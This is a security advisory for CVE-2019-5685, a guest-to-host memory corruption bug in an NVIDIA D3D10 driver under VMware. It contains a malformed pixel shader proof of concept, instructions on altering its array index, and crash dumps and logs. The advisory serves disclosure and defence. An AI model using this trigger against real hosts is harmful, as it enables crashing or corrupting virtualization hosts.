CVE-2019- 5685
An exploitable memory corruption vulnerability exists in NVIDIA NVWGF2UMX_CFG driver, versions 25.21.14.2531 and 425.31. A specially crafted pixel shader can cause an untrusted pointer dereference. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from VMware guest, affecting VMware host.
NVWGF2UMX_CFG.DLL (version 25.21.14.2531) NVIDIA D3D10 Driver, Version 425.31 on NVIDIA Quadro K620 VMware Workstation 15 (15.0.4 build-12990004) with Windows 10 x64 as guestVM
http://nvidia.com http://vmware.com
9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE-822: Untrusted Pointer Dereference
This vulnerability can be triggered by supplying a malformed pixel shader (inside VMware guest OS) to the NVIDIA NVWGF2UMX_CFG.DLL driver. Such an attack can be triggered from a VMware guest usermode to cause an untrusted pointer dereference (potential memory corruption) on vmware-vmx.exe process on host, or theoretically through WEBGL (remote website).
Example of malformed pixel shader:
ps_4_0
dcl_constantbuffer cb0[3], immediateIndexed
dcl_indexableTemp x1[65], 4
mov r17.xyz, v0.xyzw
div r17.w, l(1.000000, 1.000000, 1.000000, 1.000000), v0.xyzw
mov r0.xyzw, r17.xyzw
mad r0.y, r17.xyzw, cb0[2].xxxx, cb0[2].yyyy
mov x1[0].x, l(0,0,0,0)
mov x1[1].x, l(1,1,1,1)
mov x1[2].x, l(1,1,1,1)
mov x1[3].x, l(1,1,1,1)
mov x1[4].x, l(0,0,0,0)
mov x1[5].x, l(0,0,0,0)
mov x1[6].x, l(1,1,1,1)
mov x1[7].x, l(0,0,0,0)
mov x1[8].x, l(0,0,0,0)
mov x1[9].x, l(1,1,1,1)
mov x1[10].x, l(0,0,0,0)
mov x1[11].x, l(1,1,1,1)
mov x1[12].x, l(0,0,0,0)
mov x1[13].x, l(0,0,0,0)
mov x1[14].x, l(1,1,1,1)
mov x1[39385].x, l(0,0,0,0)
...
DCL_INDEXABLETEMP
function declares an indexable, temporary register (in this case 65 is the number of elements in the register array, and 4 is the number of components in the register array).
By modifying the shader bytecode of the MOV X1[X]
instruction (particularly, changing the index of the array to be larger than 65) it is possible to cause an untrusted pointer dereference in NVIDIA’s NVWGF2UMX_CFG.DLL
driver.
(vmware release mode crash dump fragment):
0:015> .ecxr
rax=0000000000000000 rbx=0000021fa6627bc0 rcx=0000025fa668a150
rdx=0000000000000002 rsi=0000000000000000 rdi=0000021fa6625600
rip=00007ffdca904d0b rsp=0000001f15efb740 rbp=0000001f15efb840
r8=00007ffdca610000 r9=000000003fea6842 r10=00000000000000e4
r11=0000000000000084 r12=0000000000040300 r13=0000000000000001
r14=0000021fa677d920 r15=0000021fa67e3910
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
nvwgf2umx_cfg!OpenAdapter12+0x17b66b:
00007ffd`ca904d0b 488901 mov qword ptr [rcx],rax ds:0000025f`a668a150=????????????????
stack trace:
0:015> kb
*** Stack trace for last set context - .thread/.cxr resets it
# RetAddr : Args to Child : Call Site
00 00007ffd`ca79dfb1 : 0000021f`a677d920 00007ffd`cb315bc0 0000021f`a677d920 0000021f`a5fe98c0 : nvwgf2umx_cfg!OpenAdapter12+0x17b66b
01 00007ffd`ca79e7a8 : 00007ffd`ca7870b0 0000021f`a63ad330 00007ffd`ca7870b0 0000021f`a656ded0 : nvwgf2umx_cfg!OpenAdapter12+0x14911
02 00007ffd`ca79f906 : 0000021f`a62af948 0000001f`15efbae9 00000000`84000185 00007ffd`d936d997 : nvwgf2umx_cfg!OpenAdapter12+0x15108
03 00007ffd`ca99a9d9 : 0000021f`a62af948 0000021f`a5ff7c80 0000001f`15efbdf0 00000000`00000110 : nvwgf2umx_cfg!OpenAdapter12+0x16266
04 00007ffd`cb4c0d61 : 0000021f`00000000 00000000`000013c8 0000021f`a62af948 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x211339
05 00007ffd`cb4baaa7 : 0000021f`a62af948 00000000`00000000 0000021f`a5e1a260 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x347461
06 00007ffd`d279b11d : 00000000`00000000 0000001f`15efc5d0 0000021f`a62af938 0000021f`a5e0dc70 : nvwgf2umx_cfg!NVAPI_Thunk+0x3411a7
07 00007ffd`d2794eab : 0000021f`a67cf96c 0000021f`a5e0dc70 0000021f`a62af938 00000000`00000000 : d3d11!CPixelShader::CLS::FinalConstruct+0x219
08 00007ffd`d2794dc3 : 0000001f`15efe140 00007ffd`d2973b10 0000021f`a62af7e0 00000000`00000000 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
09 00007ffd`d27a7665 : 0000021f`a62af830 0000001f`15efe140 0000001f`15efe170 00007ffd`d2973b10 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x14b
0a 00007ffd`d27acac6 : 00000000`00000000 00000000`00000030 00000000`00000000 00000000`00000030 : d3d11!CDevice::CreateLayeredChild+0x975
0b 00007ffd`d27ad3c0 : 0000021f`a62af7e0 0000021f`a64e3f28 00007ffd`d29730e8 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x266
0c 00007ffd`d278ca83 : 0000021f`a5fc65d0 0000021f`00000009 0000021f`a5fc6e08 00007ffd`d278aa43 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
0d 00007ffd`d278a976 : 0000021f`a67cf8d0 00000000`0000b000 0000001f`15efe569 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x5f
0e 00007ffd`d278a768 : 0000021f`a5fc6e08 0000021f`a67cf8d0 00000000`00001424 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x202
0f 00007ff7`33968802 : 0000021f`a67c5060 00007ff7`336b0000 00007ff7`336b0000 0000021e`203e0600 : d3d11!CDevice::CreatePixelShader+0x28
10 00007ff7`3396a0e5 : 0000021f`a67c5060 00007ff7`336b0000 00007ff7`336b0000 0000021f`a5fc6628 : vmware_vmx+0x2b8802
11 00007ff7`33968f62 : 0000021f`a67ccfe0 00007ff7`336b0000 0000021f`a67c5060 0000021f`a67c5060 : vmware_vmx+0x2ba0e5
12 00007ff7`33965451 : 00000000`fffe4000 0000021f`a67c5060 00000000`00000003 0000021f`a667a4d0 : vmware_vmx+0x2b8f62
13 00007ff7`338beec9 : 00007ff7`338bee00 0000021f`a667a4c0 00000000`00000028 00007ff7`339a3e50 : vmware_vmx+0x2b5451
14 00007ff7`338529d2 : 00000000`00000040 00007ff7`338bee00 0000001f`15eff810 00000000`00000028 : vmware_vmx+0x20eec9
15 00007ff7`33850a9f : 0000001f`15eff930 00000000`00000040 00000000`00000000 00000000`00000001 : vmware_vmx+0x1a29d2
16 00007ff7`337a65a0 : 0000021e`203e0600 0000021e`203e06e0 00000000`00000001 00000000`00000000 : vmware_vmx+0x1a0a9f
17 00007ff7`33ccc7b0 : 00007ff7`337a6480 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0xf65a0
18 00007ffd`d6bc7974 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x61c7b0
19 00007ffd`d93ca271 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
1a 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
From vmware-vmx.exe (this is not a windbg crash dump):
2019-04-16T12:12:57.186+02:00| svga| W115: ----Win32 exception detected, exceptionCode 0xc0000005 (access violation)----
2019-04-16T12:12:57.186+02:00| svga| W115: ExceptionAddress 0x7ffdca904d0b eflags 0x00010246
2019-04-16T12:12:57.186+02:00| svga| W115: rwFlags 0x1 badAddr 0x25fa668a150
2019-04-16T12:12:57.187+02:00| svga| W115: rax 0 rbx 0x21fa6627bc0 rcx 0x25fa668a150
2019-04-16T12:12:57.187+02:00| svga| W115: rdx 0 rsi 0 rdi 0x21fa6625600
2019-04-16T12:12:57.187+02:00| svga| W115: r8 0x7ffdca610000 r9 0x3fea6842 r10 0xe4
2019-04-16T12:12:57.187+02:00| svga| W115: r11 0x84 r12 0x40300 r13 0x1
2019-04-16T12:12:57.187+02:00| svga| W115: r14 0x21fa677d920 r15 0x21fa67e3910
2019-04-16T12:12:57.187+02:00| svga| W115: rip 0x7ffdca904d0b rsp 0x1f15efb740 rbp 0x1f15efb840
2019-04-16T12:12:57.187+02:00| svga| W115: LastBranchToRip 0 LastBranchFromRip 0
2019-04-16T12:12:57.187+02:00| svga| W115: LastExceptionToRip 0 LastExceptionFromRip 0
2019-04-16T12:12:57.187+02:00| svga| W115: The following data was delivered with the exception:
2019-04-16T12:12:57.187+02:00| svga| W115: -- 0x1
2019-04-16T12:12:57.187+02:00| svga| W115: -- 0x25fa668a150
2019-04-16T12:12:57.187+02:00| svga| I125: CoreDump: Minidump file K:\vmware_images\windows_10_x64_uefi\vmware-vmx.dmp exists. Rotating ...
2019-04-16T12:12:57.191+02:00| svga| W115: CoreDump: Writing minidump to K:\vmware_images\windows_10_x64_uefi\vmware-vmx.dmp
2019-04-16T12:12:57.379+02:00| svga| I125: CoreDump: including module base 0x0x7ff7336b0000 size 0x0x0124d000
2019-04-16T12:12:57.379+02:00| svga| I125: checksum 0x00f675c1 timestamp 0x5c9991d2
2019-04-16T12:12:57.379+02:00| svga| I125: image file K:\tools\vmware\x64\vmware-vmx.exe
2019-04-16T12:12:57.379+02:00| svga| I125: file version 15.0.4.45173
2019-04-16T12:12:57.379+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd9360000 size 0x0x001ed000
2019-04-16T12:12:57.379+02:00| svga| I125: checksum 0x001ebfe1 timestamp 0xbf6ea104
2019-04-16T12:12:57.379+02:00| svga| I125: image file C:\Windows\System32\ntdll.dll
2019-04-16T12:12:57.379+02:00| svga| I125: file version 10.0.17763.404
2019-04-16T12:12:57.379+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6bb0000 size 0x0x000b3000
2019-04-16T12:12:57.379+02:00| svga| I125: checksum 0x000b8bb9 timestamp 0xa9e3d878
2019-04-16T12:12:57.379+02:00| svga| I125: image file C:\Windows\System32\kernel32.dll
2019-04-16T12:12:57.379+02:00| svga| I125: file version 10.0.17763.437
2019-04-16T12:12:57.379+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd62f0000 size 0x0x00293000
2019-04-16T12:12:57.379+02:00| svga| I125: checksum 0x002955e7 timestamp 0x2528b630
2019-04-16T12:12:57.379+02:00| svga| I125: image file C:\Windows\System32\KERNELBASE.dll
2019-04-16T12:12:57.379+02:00| svga| I125: file version 10.0.17763.404
2019-04-16T12:12:57.379+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd56c0000 size 0x0x000fa000
2019-04-16T12:12:57.379+02:00| svga| I125: checksum 0x0010666d timestamp 0x490b0aeb
2019-04-16T12:12:57.379+02:00| svga| I125: image file C:\Windows\System32\ucrtbase.dll
2019-04-16T12:12:57.379+02:00| svga| I125: file version 10.0.17763.404
2019-04-16T12:12:57.379+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd71c0000 size 0x0x00197000
2019-04-16T12:12:57.379+02:00| svga| I125: checksum 0x0019e334 timestamp 0x5960d576
2019-04-16T12:12:57.379+02:00| svga| I125: image file C:\Windows\System32\user32.dll
2019-04-16T12:12:57.379+02:00| svga| I125: file version 10.0.17763.168
2019-04-16T12:12:57.379+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5a80000 size 0x0x00020000
2019-04-16T12:12:57.379+02:00| svga| I125: checksum 0x000230fc timestamp 0xff141dbb
2019-04-16T12:12:57.379+02:00| svga| I125: image file C:\Windows\System32\win32u.dll
2019-04-16T12:12:57.379+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.379+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd7190000 size 0x0x00029000
2019-04-16T12:12:57.379+02:00| svga| I125: checksum 0x000274e8 timestamp 0xaa866dfc
2019-04-16T12:12:57.379+02:00| svga| I125: image file C:\Windows\System32\gdi32.dll
2019-04-16T12:12:57.379+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.379+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd57c0000 size 0x0x0019a000
2019-04-16T12:12:57.379+02:00| svga| I125: checksum 0x001a616f timestamp 0xb135bc52
2019-04-16T12:12:57.379+02:00| svga| I125: image file C:\Windows\System32\gdi32full.dll
2019-04-16T12:12:57.379+02:00| svga| I125: file version 10.0.17763.437
2019-04-16T12:12:57.379+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc4d90000 size 0x0x00015000
2019-04-16T12:12:57.380+02:00| svga| I125: checksum 0x00017b21 timestamp 0x5be33079
2019-04-16T12:12:57.380+02:00| svga| I125: image file C:\Windows\System32\VCRUNTIME140.dll
2019-04-16T12:12:57.380+02:00| svga| I125: file version 14.16.27024.1
2019-04-16T12:12:57.380+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5aa0000 size 0x0x000a0000
2019-04-16T12:12:57.380+02:00| svga| I125: checksum 0x000a22bb timestamp 0x448f33c2
2019-04-16T12:12:57.380+02:00| svga| I125: image file C:\Windows\System32\msvcp_win.dll
2019-04-16T12:12:57.380+02:00| svga| I125: file version 10.0.17763.348
2019-04-16T12:12:57.380+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6ee0000 size 0x0x00155000
2019-04-16T12:12:57.380+02:00| svga| I125: checksum 0x00155939 timestamp 0x5593b9c6
2019-04-16T12:12:57.380+02:00| svga| I125: image file C:\Windows\System32\ole32.dll
2019-04-16T12:12:57.380+02:00| svga| I125: file version 10.0.17763.404
2019-04-16T12:12:57.380+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd8ba0000 size 0x0x0032c000
2019-04-16T12:12:57.380+02:00| svga| I125: checksum 0x0032e257 timestamp 0x1c3dc270
2019-04-16T12:12:57.380+02:00| svga| I125: image file C:\Windows\System32\combase.dll
2019-04-16T12:12:57.380+02:00| svga| I125: file version 10.0.17763.404
2019-04-16T12:12:57.380+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd7360000 size 0x0x00122000
2019-04-16T12:12:57.380+02:00| svga| I125: checksum 0x00124564 timestamp 0x28d25d35
2019-04-16T12:12:57.380+02:00| svga| I125: image file C:\Windows\System32\rpcrt4.dll
2019-04-16T12:12:57.380+02:00| svga| I125: file version 10.0.17763.379
2019-04-16T12:12:57.380+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5980000 size 0x0x0007e000
2019-04-16T12:12:57.380+02:00| svga| I125: checksum 0x000897e0 timestamp 0xe29631ca
2019-04-16T12:12:57.380+02:00| svga| I125: image file C:\Windows\System32\bcryptPrimitives.dll
2019-04-16T12:12:57.380+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.380+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6b00000 size 0x0x000a3000
2019-04-16T12:12:57.380+02:00| svga| I125: checksum 0x000a4051 timestamp 0xb12069f9
2019-04-16T12:12:57.380+02:00| svga| I125: image file C:\Windows\System32\advapi32.dll
2019-04-16T12:12:57.380+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.380+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6c70000 size 0x0x0009e000
2019-04-16T12:12:57.380+02:00| svga| I125: checksum 0x000a6576 timestamp 0x05c26c69
2019-04-16T12:12:57.380+02:00| svga| I125: image file C:\Windows\System32\msvcrt.dll
2019-04-16T12:12:57.380+02:00| svga| I125: file version 7.0.17763.1
2019-04-16T12:12:57.380+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd9290000 size 0x0x0009e000
2019-04-16T12:12:57.380+02:00| svga| I125: checksum 0x000a9176 timestamp 0x7d59184a
2019-04-16T12:12:57.380+02:00| svga| I125: image file C:\Windows\System32\sechost.dll
2019-04-16T12:12:57.380+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.380+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd7500000 size 0x0x014f0000
2019-04-16T12:12:57.380+02:00| svga| I125: checksum 0x01517832 timestamp 0x6a056922
2019-04-16T12:12:57.380+02:00| svga| I125: image file C:\Windows\System32\shell32.dll
2019-04-16T12:12:57.380+02:00| svga| I125: file version 10.0.17763.348
2019-04-16T12:12:57.380+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5a30000 size 0x0x0004a000
2019-04-16T12:12:57.380+02:00| svga| I125: checksum 0x0004f3eb timestamp 0xca7e64ca
2019-04-16T12:12:57.380+02:00| svga| I125: image file C:\Windows\System32\cfgmgr32.dll
2019-04-16T12:12:57.380+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.380+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd70c0000 size 0x0x000a8000
2019-04-16T12:12:57.380+02:00| svga| I125: checksum 0x000a6bc1 timestamp 0x9a0e77eb
2019-04-16T12:12:57.380+02:00| svga| I125: image file C:\Windows\System32\SHCore.dll
2019-04-16T12:12:57.380+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.380+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5b40000 size 0x0x0074a000
2019-04-16T12:12:57.380+02:00| svga| I125: checksum 0x0075e103 timestamp 0x1402bc75
2019-04-16T12:12:57.380+02:00| svga| I125: image file C:\Windows\System32\windows.storage.dll
2019-04-16T12:12:57.380+02:00| svga| I125: file version 10.0.17763.404
2019-04-16T12:12:57.380+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5400000 size 0x0x00024000
2019-04-16T12:12:57.380+02:00| svga| I125: checksum 0x0002ec08 timestamp 0x36191177
2019-04-16T12:12:57.380+02:00| svga| I125: image file C:\Windows\System32\profapi.dll
2019-04-16T12:12:57.380+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.380+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd53a0000 size 0x0x0005d000
2019-04-16T12:12:57.380+02:00| svga| I125: checksum 0x0006167d timestamp 0x8941f3e3
2019-04-16T12:12:57.380+02:00| svga| I125: image file C:\Windows\System32\powrprof.dll
2019-04-16T12:12:57.381+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.381+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd7490000 size 0x0x00052000
2019-04-16T12:12:57.381+02:00| svga| I125: checksum 0x0005be0c timestamp 0x4392c932
2019-04-16T12:12:57.381+02:00| svga| I125: image file C:\Windows\System32\shlwapi.dll
2019-04-16T12:12:57.381+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.381+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5360000 size 0x0x00011000
2019-04-16T12:12:57.381+02:00| svga| I125: checksum 0x0001c039 timestamp 0xbe88784d
2019-04-16T12:12:57.381+02:00| svga| I125: image file C:\Windows\System32\kernel.appcore.dll
2019-04-16T12:12:57.381+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.381+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5960000 size 0x0x00017000
2019-04-16T12:12:57.381+02:00| svga| I125: checksum 0x0001f088 timestamp 0xfe800ac7
2019-04-16T12:12:57.381+02:00| svga| I125: image file C:\Windows\System32\cryptsp.dll
2019-04-16T12:12:57.381+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.381+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6590000 size 0x0x00476000
2019-04-16T12:12:57.381+02:00| svga| I125: checksum 0x00488689 timestamp 0xcc9bc0eb
2019-04-16T12:12:57.381+02:00| svga| I125: image file C:\Windows\System32\setupapi.dll
2019-04-16T12:12:57.381+02:00| svga| I125: file version 10.0.17763.404
2019-04-16T12:12:57.381+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5a00000 size 0x0x00026000
2019-04-16T12:12:57.381+02:00| svga| I125: checksum 0x0002f670 timestamp 0x4d019572
2019-04-16T12:12:57.381+02:00| svga| I125: image file C:\Windows\System32\bcrypt.dll
2019-04-16T12:12:57.381+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.381+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd7050000 size 0x0x0006d000
2019-04-16T12:12:57.381+02:00| svga| I125: checksum 0x0006d338 timestamp 0x4ee4fbbf
2019-04-16T12:12:57.381+02:00| svga| I125: image file C:\Windows\System32\ws2_32.dll
2019-04-16T12:12:57.381+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.381+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd8ad0000 size 0x0x000c4000
2019-04-16T12:12:57.381+02:00| svga| I125: checksum 0x000d15cf timestamp 0xbcde805b
2019-04-16T12:12:57.381+02:00| svga| I125: image file C:\Windows\System32\oleaut32.dll
2019-04-16T12:12:57.381+02:00| svga| I125: file version 10.0.17763.437
2019-04-16T12:12:57.381+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5430000 size 0x0x001db000
2019-04-16T12:12:57.381+02:00| svga| I125: checksum 0x001de80e timestamp 0xb2fbbe58
2019-04-16T12:12:57.381+02:00| svga| I125: image file C:\Windows\System32\crypt32.dll
2019-04-16T12:12:57.381+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.381+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5380000 size 0x0x00012000
2019-04-16T12:12:57.381+02:00| svga| I125: checksum 0x0001b8e7 timestamp 0xac91a4b2
2019-04-16T12:12:57.381+02:00| svga| I125: image file C:\Windows\System32\msasn1.dll
2019-04-16T12:12:57.381+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.381+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd3640000 size 0x0x00024000
2019-04-16T12:12:57.381+02:00| svga| I125: checksum 0x00029b8b timestamp 0x01dd0441
2019-04-16T12:12:57.381+02:00| svga| I125: image file C:\Windows\System32\winmm.dll
2019-04-16T12:12:57.381+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.381+02:00| svga| I125: CoreDump: including module base 0x0x7ffdb1eb0000 size 0x0x00096000
2019-04-16T12:12:57.381+02:00| svga| I125: checksum 0x00097a6b timestamp 0x807cb1be
2019-04-16T12:12:57.381+02:00| svga| I125: image file C:\Windows\System32\dsound.dll
2019-04-16T12:12:57.381+02:00| svga| I125: file version 10.0.17763.348
2019-04-16T12:12:57.381+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd1050000 size 0x0x000f1000
2019-04-16T12:12:57.381+02:00| svga| I125: checksum 0x000fe09f timestamp 0x94933b3b
2019-04-16T12:12:57.381+02:00| svga| I125: image file C:\Windows\System32\winhttp.dll
2019-04-16T12:12:57.381+02:00| svga| I125: file version 10.0.17763.404
2019-04-16T12:12:57.381+02:00| svga| I125: CoreDump: including module base 0x0x7ffdcddc0000 size 0x0x00041000
2019-04-16T12:12:57.381+02:00| svga| I125: checksum 0x00040f64 timestamp 0xc2c19daa
2019-04-16T12:12:57.381+02:00| svga| I125: image file C:\Windows\System32\WinSCard.dll
2019-04-16T12:12:57.381+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.381+02:00| svga| I125: CoreDump: including module base 0x0x64190000 size 0x0x0001a000
2019-04-16T12:12:57.381+02:00| svga| I125: checksum 0x00025128 timestamp 0x5b281fdf
2019-04-16T12:12:57.381+02:00| svga| I125: image file K:\tools\vmware\x64\zlib1.dll
2019-04-16T12:12:57.381+02:00| svga| I125: file version 1.2.11.0
2019-04-16T12:12:57.381+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd1da0000 size 0x0x00013000
2019-04-16T12:12:57.382+02:00| svga| I125: checksum 0x000141f8 timestamp 0x645d63a8
2019-04-16T12:12:57.382+02:00| svga| I125: image file C:\Windows\System32\wtsapi32.dll
2019-04-16T12:12:57.382+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.382+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd3610000 size 0x0x0002d000
2019-04-16T12:12:57.382+02:00| svga| I125: checksum 0x000313bc timestamp 0x61c36296
2019-04-16T12:12:57.382+02:00| svga| I125: image file C:\Windows\System32\WINMMBASE.dll
2019-04-16T12:12:57.382+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.382+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5170000 size 0x0x00029000
2019-04-16T12:12:57.382+02:00| svga| I125: checksum 0x00035933 timestamp 0x38fddd55
2019-04-16T12:12:57.382+02:00| svga| I125: image file C:\Windows\System32\devobj.dll
2019-04-16T12:12:57.382+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.382+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6ad0000 size 0x0x0002e000
2019-04-16T12:12:57.382+02:00| svga| I125: checksum 0x000306da timestamp 0x6b207046
2019-04-16T12:12:57.382+02:00| svga| I125: image file C:\Windows\System32\imm32.dll
2019-04-16T12:12:57.382+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.382+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd39a0000 size 0x0x0009c000
2019-04-16T12:12:57.382+02:00| svga| I125: checksum 0x00098b0d timestamp 0x4b037c22
2019-04-16T12:12:57.382+02:00| svga| I125: image file C:\Windows\System32\uxtheme.dll
2019-04-16T12:12:57.382+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.382+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd44a0000 size 0x0x00031000
2019-04-16T12:12:57.382+02:00| svga| I125: checksum 0x000360d6 timestamp 0x376a9861
2019-04-16T12:12:57.382+02:00| svga| I125: image file C:\Windows\System32\ntmarta.dll
2019-04-16T12:12:57.382+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.382+02:00| svga| I125: CoreDump: including module base 0x0x63f40000 size 0x0x0024b000
2019-04-16T12:12:57.382+02:00| svga| I125: checksum 0x00250d79 timestamp 0x5c0d2810
2019-04-16T12:12:57.382+02:00| svga| I125: image file K:\tools\vmware\x64\libeay32.dll
2019-04-16T12:12:57.382+02:00| svga| I125: file version 1.0.2.17
2019-04-16T12:12:57.382+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc6410000 size 0x0x0005d000
2019-04-16T12:12:57.382+02:00| svga| I125: checksum 0x0006be35 timestamp 0x5c0d281f
2019-04-16T12:12:57.382+02:00| svga| I125: image file K:\tools\vmware\x64\ssleay32.dll
2019-04-16T12:12:57.382+02:00| svga| I125: file version 1.0.2.17
2019-04-16T12:12:57.382+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd4740000 size 0x0x00033000
2019-04-16T12:12:57.382+02:00| svga| I125: checksum 0x00039b84 timestamp 0xeb037b86
2019-04-16T12:12:57.382+02:00| svga| I125: image file C:\Windows\System32\rsaenh.dll
2019-04-16T12:12:57.382+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.382+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd4db0000 size 0x0x0000c000
2019-04-16T12:12:57.382+02:00| svga| I125: checksum 0x0000d582 timestamp 0x210d2d73
2019-04-16T12:12:57.382+02:00| svga| I125: image file C:\Windows\System32\CRYPTBASE.dll
2019-04-16T12:12:57.382+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.382+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5260000 size 0x0x0002f000
2019-04-16T12:12:57.382+02:00| svga| I125: checksum 0x000339df timestamp 0xebd3b7f6
2019-04-16T12:12:57.382+02:00| svga| I125: image file C:\Windows\System32\sspicli.dll
2019-04-16T12:12:57.382+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.382+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd4be0000 size 0x0x00067000
2019-04-16T12:12:57.382+02:00| svga| I125: checksum 0x0006982f timestamp 0x9cffe601
2019-04-16T12:12:57.382+02:00| svga| I125: image file C:\Windows\System32\mswsock.dll
2019-04-16T12:12:57.382+02:00| svga| I125: file version 10.0.17763.292
2019-04-16T12:12:57.382+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd4920000 size 0x0x000c6000
2019-04-16T12:12:57.382+02:00| svga| I125: checksum 0x000d24fb timestamp 0x33466d5f
2019-04-16T12:12:57.382+02:00| svga| I125: image file C:\Windows\System32\dnsapi.dll
2019-04-16T12:12:57.382+02:00| svga| I125: file version 10.0.17763.404
2019-04-16T12:12:57.382+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6a10000 size 0x0x00008000
2019-04-16T12:12:57.382+02:00| svga| I125: checksum 0x0000c1ee timestamp 0x7ace72dc
2019-04-16T12:12:57.382+02:00| svga| I125: image file C:\Windows\System32\nsi.dll
2019-04-16T12:12:57.382+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.382+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd48e0000 size 0x0x0003d000
2019-04-16T12:12:57.382+02:00| svga| I125: checksum 0x0003b254 timestamp 0x55458551
2019-04-16T12:12:57.382+02:00| svga| I125: image file C:\Windows\System32\IPHLPAPI.DLL
2019-04-16T12:12:57.383+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.383+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc8020000 size 0x0x0000a000
2019-04-16T12:12:57.383+02:00| svga| I125: checksum 0x0000ec91 timestamp 0x389781ac
2019-04-16T12:12:57.383+02:00| svga| I125: image file C:\Windows\System32\rasadhlp.dll
2019-04-16T12:12:57.383+02:00| svga| I125: file version 10.0.17763.1
